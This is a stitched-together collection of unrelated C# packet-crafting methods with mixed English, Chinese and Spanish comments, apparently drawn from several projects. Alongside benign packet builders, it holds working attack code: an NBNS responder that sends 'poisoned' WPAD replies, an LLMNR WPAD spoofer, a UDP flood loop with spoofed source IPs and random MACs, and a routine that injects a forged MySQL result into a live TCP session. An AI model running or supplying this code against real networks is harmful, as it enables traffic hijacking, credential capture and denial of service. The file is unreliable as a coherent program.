/// <summary>
/// Fires off on a seperate thread when a packet is available
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private void ProcessPacket(RawCapture incoming)
{
try
{
Packet packet = Packet.ParsePacket(LinkLayers.Ethernet, incoming.Data);
EthernetPacket ethSrc = (EthernetPacket)packet.Extract(typeof(EthernetPacket));
IPv4Packet ipSrc = (IPv4Packet)packet.Extract(typeof(IPv4Packet));
if (ipSrc.Protocol == IPProtocolType.UDP)
{
UdpPacket udpSrc = (UdpPacket)packet.Extract(typeof(UdpPacket));
// From RFC 1002 Section 4.2.1.1
// Need to grab the transaction id for the reply
UInt16 namedTrnId = BitConverter.ToUInt16(udpSrc.PayloadData, 0);
// Looking for Response = query(0), OpCode = Query(0)
// 11000000 00000000
UInt16 flags = Utility.ReverseUInt16(BitConverter.ToUInt16(udpSrc.PayloadData, 2));
if ((flags & 0xc000) == 0)
{
// Grab the name and make sure it's WPAD
string name = Encoding.Default.GetString(udpSrc.PayloadData, 12, 34);
if (Utility.DecodeName(name) == WpadHostName)
{
Logger.AddToInfoView("Received NBNS query for {0} from {1}", WpadHostName, ethSrc.SourceHwAddress);
UdpPacket udpDst = new UdpPacket(NetbiosPort, NetbiosPort);
udpDst.PayloadData = SetupResponse(namedTrnId, GetDeviceIp(this.Device));
IPv4Packet ipDst = new IPv4Packet(GetDeviceIp(this.Device), ipSrc.SourceAddress);
ipDst.PayloadPacket = udpDst;
udpDst.UpdateCalculatedValues();
udpDst.UpdateUDPChecksum();
ipDst.UpdateCalculatedValues();
ipDst.UpdateIPChecksum();
EthernetPacket ethDst = new EthernetPacket(this.Device.MacAddress, ethSrc.SourceHwAddress, EthernetPacketType.IpV4);
ethDst.PayloadPacket = ipDst;
ethDst.UpdateCalculatedValues();
Logger.AddToInfoView("Sending poisoned response for {0}", WpadHostName);
this.Device.SendPacket(ethDst.Bytes);
}
}
}
else if (ipSrc.Protocol == IPProtocolType.TCP)
{
TcpPacket tcpSrc = (TcpPacket)packet.Extract(typeof(TcpPacket));
if (tcpSrc.Syn)
{
Logger.AddToInfoView("SYN sent {0}:{1}", ipSrc.DestinationAddress, tcpSrc.SourcePort);
}
}
}
catch (Exception ex)
{
Logger.AddToErrorView("OnPacketArrival", ex);
}
}
/// <summary>
/// 使用函数构造UDP数据包
/// </summary>
/// <param name="device"></param>
/// <param name="dst_mac"></param>
/// <param name="dst_ip"></param>
/// <param name="src_port"></param>
/// <param name="dst_port"></param>
/// <param name="send_data"></param>
/// <returns></returns>
private byte[] GenUDPPacket(PcapDevice device, PhysicalAddress dst_mac, IPAddress dst_ip, int src_port,
int dst_port, string send_data)
{
// 构造UDP部分数据报
UdpPacket udp_pkg = new UdpPacket((ushort)src_port, (ushort)dst_port);
udp_pkg.PayloadData = strToToHexByte(send_data);
udp_pkg.UpdateCalculatedValues();
// 构造IP部分数据报
IPv4Packet ip_pkg = new IPv4Packet(device.Interface.Addresses[1].Addr.ipAddress, dst_ip);
ip_pkg.Protocol = IPProtocolType.UDP;
ip_pkg.Version = IpVersion.IPv4;
ip_pkg.PayloadData = udp_pkg.Bytes;
ip_pkg.TimeToLive = 10;
ip_pkg.UpdateCalculatedValues();
ip_pkg.UpdateIPChecksum();
// 构造以太网帧
EthernetPacket net_pkg = new EthernetPacket(device.MacAddress, dst_mac, EthernetPacketType.IpV4);
net_pkg.Type = EthernetPacketType.IpV4;
net_pkg.PayloadData = ip_pkg.Bytes;
net_pkg.UpdateCalculatedValues();
return(net_pkg.Bytes);
}
public Packet Build(EthernetPacket packet, UserSession session)
{
var mSrc = packet.SourceHardwareAddress;
var mDst = PhysicalAddress.Parse("00-19-C5-12-C5-C9");
var ipPacket = packet.Extract <IPPacket>();
if (ipPacket == null)
{
return(null);
}
var udpPacket = packet.Extract <UdpPacket>();
if (udpPacket == null)
{
return(null);
}
var src = IPAddress.Parse("10.253.0.1");
var dst = ipPacket.SourceAddress;
var newEthernetPacket = new EthernetPacket(mDst, mSrc, EthernetType.None);
var newIpPacket = new IPv4Packet(src, dst);
_payload[0x9d] = Convert.ToByte(_memoryContext.UserSession.Count());
var user = _userManager.Users.Where(u => u.Id == session.UserId).FirstOrDefault();
var newUdpPacket = new UdpPacket(udpPacket.DestinationPort, udpPacket.SourcePort);
newUdpPacket.PayloadData = InjectName(_payload, $"Welcome {user.UserName}!");
newUdpPacket.UpdateCalculatedValues();
newIpPacket.PayloadPacket = newUdpPacket;
newIpPacket.UpdateCalculatedValues();
newIpPacket.UpdateIPChecksum();
newEthernetPacket.PayloadPacket = newIpPacket;
//await clients.Client(session.ConnectionId).SendGamePacket(session, newEthernetPacket);
byte requestRegion = packet.Bytes[packet.Bytes.Length - 4];
session.Status = String.Format(UserStatus.AT_LOBBY, GetGameVersion(requestRegion));
_memoryContext.UserSession.Update(session);
_memoryContext.SaveChangesAsync().Wait();
return(newEthernetPacket);
}
public static IPv4Packet CreateIpV4Packet(IPAddress sourceIpAddress, IPAddress destinationIpAddress,
TcpPacket payloadPacket)
{
var result = new IPv4Packet(sourceIpAddress, destinationIpAddress)
{
PayloadPacket = payloadPacket
};
payloadPacket.UpdateTCPChecksum();
result.UpdateIPChecksum();
result.UpdateCalculatedValues();
return(result);
}
public void GenerateLLMNRResponse(Packet packet)
{
try
{
LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
llmnr.ParsePacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).PayloadData);
if (llmnr.Query.Name.ToLower().Equals("wpad") && llmnr.Query.Type.Value == LLMNR.DNSType.A)
{
WinPcapDevice dev = Program.CurrentProject.data.GetDevice();
IPAddress ip = Program.CurrentProject.data.GetIPv4FromDevice(dev);
byte[] ipv4Addr = ip.GetAddressBytes();
llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
{
Class = evilfoca.LLMNR.DNSClass.IN,
Name = llmnr.Query.Name,
Type = evilfoca.LLMNR.DNSType.A,
RData = ipv4Addr,
RDLength = (short)ipv4Addr.Length,
TTL = 12
});
llmnr.IsResponse = true;
EthernetPacket ethDns = new EthernetPacket(dev.MacAddress, ((EthernetPacket)packet).SourceHwAddress, EthernetPacketType.IpV4);
IPv4Packet ipv4Dns = new IPv4Packet(ip, ((IPv4Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort, ((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort);
udpDns.PayloadData = llmnr.BuildPacket();
ipv4Dns.PayloadPacket = udpDns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv4Dns.UpdateIPChecksum();
ipv4Dns.UpdateCalculatedValues();
ethDns.PayloadPacket = ipv4Dns;
Program.CurrentProject.data.SendPacket(ethDns);
}
}
catch (Exception)
{
}
}
private void processUdpFlood(Object Params)
{
AttackParams _params = Params as AttackParams;
if (_params.UdpFloodEnabled)
{
NetworkInstruments.IpRandomizer IpSpoofer = new NetworkInstruments.IpRandomizer();
PhysicalAddress TargetMac = NetworkInstruments.ResolveMac(Adapter, _params.Target.Address);
ICaptureDevice ActiveDevice = NetworkInstruments.getActiveDevice(Adapter.GetPhysicalAddress());
ActiveDevice.Open();
UdpPacket udpPacket = new UdpPacket(0, 80);
IPv4Packet ipPacket = new IPv4Packet(IPAddress.Any, _params.Target.Address);
ipPacket.Protocol = IPProtocolType.UDP;
ipPacket.PayloadPacket = udpPacket;
if (TargetMac == null)
{
ErrorHandler(1, "Can not get MAC target address");
return;
}
; //unable to resolve mac
EthernetPacket ethernetPacket = new EthernetPacket(Adapter.GetPhysicalAddress(), TargetMac, EthernetPacketType.None);
ethernetPacket.PayloadPacket = ipPacket;
while (Attacking)
{
udpPacket.SourcePort = (ushort)Randomizer.Next(1, 49160);
udpPacket.DestinationPort = (ushort)Randomizer.Next(1, 49160);
udpPacket.PayloadData = new byte[Randomizer.Next(500)];
Randomizer.NextBytes(udpPacket.PayloadData);
udpPacket.UpdateCalculatedValues();
ipPacket.SourceAddress = IpSpoofer.GetNext(ref Randomizer, _params.RestrictedPool);
ipPacket.TimeToLive = Randomizer.Next(20, 128);
ipPacket.UpdateCalculatedValues();
ipPacket.UpdateIPChecksum();
ethernetPacket.SourceHwAddress = NetworkInstruments.GetRandomMac(ref Randomizer);
ethernetPacket.UpdateCalculatedValues();
udpPacket.UpdateUDPChecksum();
ActiveDevice.SendPacket(ethernetPacket);
udpCounter++;
}
}
}
/// <summary>
/// Create packet that would be replied to by this listener if correctly injected
/// </summary>
/// <param name="data"></param>
/// <returns></returns>
public Packet GetReceivablePacket(byte[] data)
{
var ipBytes = LocalIp.GetAddressBytes();
ipBytes[3]++;
var fakeIp = new IPAddress(ipBytes);
var fakeMac = PhysicalAddress.Parse("001122334455");
var eth = new EthernetPacket(fakeMac, BroadcastMac, EthernetType.IPv6);
var ip = new IPv4Packet(fakeIp, LocalIp);
var udp = new UdpPacket(Port, Port);
eth.PayloadPacket = ip;
ip.PayloadPacket = udp;
udp.PayloadData = data;
udp.UpdateCalculatedValues();
ip.UpdateCalculatedValues();
udp.UpdateUdpChecksum();
ip.UpdateIPChecksum();
return(eth);
}
static void Ns_OnPacket(object sender, IPProtocolType protocolType, EthernetPacket packet)
{
NetworkSniffer ns = (NetworkSniffer)sender;
IPv4Packet ip = (IPv4Packet)packet.PayloadPacket;
TcpPacket t = (TcpPacket)ip.PayloadPacket;
// Si el paquete recibido es el de respuesta OK del mysql
if (t.PayloadData.SequenceEqual(ResponseOk))
{
Parent = packet;
// Replicamos el paquete, enviando el payload de la fila, si, antes de recibir el SELECT
LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
ip.Id++;
t.SequenceNumber = LastSequenceId;
t.OptionsCollection.Clear();
t.PayloadData = Payload;
t.Ack = true;
t.Psh = true;
ip.UpdateCalculatedValues();
t.UpdateCalculatedValues();
ip.UpdateIPChecksum();
t.UpdateTCPChecksum();
ns.Send(packet);
LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
Console.WriteLine(t.ToString(StringOutputType.Verbose));
}
else
{
// Si el paquete contiene el valor SELECT
string ascii = Encoding.ASCII.GetString(t.PayloadData);
if (Parent != null && ascii.Contains("SELECT"))
{
// Ya no actuamos mas
ns.OnPacket -= Ns_OnPacket;
ip = (IPv4Packet)Parent.PayloadPacket;
t = (TcpPacket)ip.PayloadPacket;
// Enviamos un ACK del paquete recibido, para darle por bueno
t.SequenceNumber = LastSequenceId;
t.AcknowledgmentNumber = t.AcknowledgmentNumber;
t.PayloadData = new byte[] { };
ip.Id++;
t.Ack = true;
t.Psh = false;
ip.UpdateCalculatedValues();
t.UpdateCalculatedValues();
ip.UpdateIPChecksum();
t.UpdateTCPChecksum();
ns.Send(packet);
Console.WriteLine(t.ToString(StringOutputType.Verbose));
}
}
}
public static Packet CreatePacket(Param param)
{
Packet ret = null;
//create layer 4
if (param.packetType == Param.PacketType.TCP)
{
TcpPacket tcpPacket = new TcpPacket(param.sPort, param.dPort);
tcpPacket.AllFlags = param.tcpFlag;
if (param.dIP.ToString().Contains("."))
{
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
ipPacket.PayloadPacket = tcpPacket;
tcpPacket.PayloadData = param.payload;
ret.PayloadPacket = ipPacket;
ipPacket.UpdateCalculatedValues();
ipPacket.UpdateIPChecksum();
tcpPacket.Checksum = (ushort)tcpPacket.CalculateTCPChecksum();
}
else
{
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
ipPacket.PayloadPacket = tcpPacket;
tcpPacket.PayloadData = param.payload;
ret.PayloadPacket = ipPacket;
}
}
else if (param.packetType == Param.PacketType.UDP)
{
UdpPacket udpPacket = new UdpPacket(param.sPort, param.dPort);
if (param.dIP.ToString().Contains("."))
{
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
ipPacket.PayloadPacket = udpPacket;
udpPacket.PayloadData = param.payload;
udpPacket.UpdateUDPChecksum();
ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length);
ipPacket.UpdateIPChecksum();
ret.PayloadPacket = ipPacket;
}
else
{
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
ipPacket.PayloadPacket = udpPacket;
udpPacket.PayloadData = param.payload;
udpPacket.UpdateUDPChecksum();
ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length);
ret.PayloadPacket = ipPacket;
}
}
else if (param.packetType == Param.PacketType.ICMP)
{
ICMPv4Packet icmpPacket = new ICMPv4Packet(new ByteArraySegment(new byte[32]));
if (param.type != 0 && param.code != 0)
{
icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256) + (param.code));
}
else if (param.type != 0)
{
icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256));
}
else
{
icmpPacket.TypeCode = ICMPv4TypeCodes.EchoRequest;
}
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ipPacket.PayloadPacket = icmpPacket;
ipPacket.Checksum = ipPacket.CalculateIPChecksum();
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
ret.PayloadPacket = ipPacket;
}
else if (param.packetType == Param.PacketType.ICMPv6)
{
ICMPv6Packet icmpv6Packet = CreateICMPv6Packet(param);
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ipPacket.PayloadPacket = icmpv6Packet;
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
ret.PayloadPacket = ipPacket;
}
else if (param.packetType == Param.PacketType.IP)
{
if (param.dIP.ToString().Contains("."))
{
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ipPacket.Protocol = param.IPProtocol;
ipPacket.PayloadData = param.payload;
ipPacket.UpdateCalculatedValues();
ret.PayloadPacket = ipPacket;
ipPacket.UpdateIPChecksum();
}
else
{
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
//if extension headers were not specified, just put the payload
if (param.ExtentionHeader.Count == 0)
{
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ipPacket.Protocol = param.IPProtocol;
ipPacket.PayloadData = param.payload;
ipPacket.PayloadLength = (ushort)param.payload.Length;
ipPacket.UpdateCalculatedValues();
ret.PayloadPacket = ipPacket;
}
else
{
ret = PacketFactory.CreateEHPacket(param, (EthernetPacket)ret);
}
ret.UpdateCalculatedValues();
}
}
else if (param.packetType == Param.PacketType.EtherType)
{
ret = new EthernetPacket(param.sMAC, param.dMAC, param.EtherTypeProtocol);
byte[] etherBuffer = (new byte[64]);
var payload = new byte[etherBuffer.Length + (param.payload).Length];
etherBuffer.CopyTo(payload, 0);
(param.payload).CopyTo(payload, etherBuffer.Length);
ret.PayloadData = payload;
ret.UpdateCalculatedValues();
}
return ret;
}
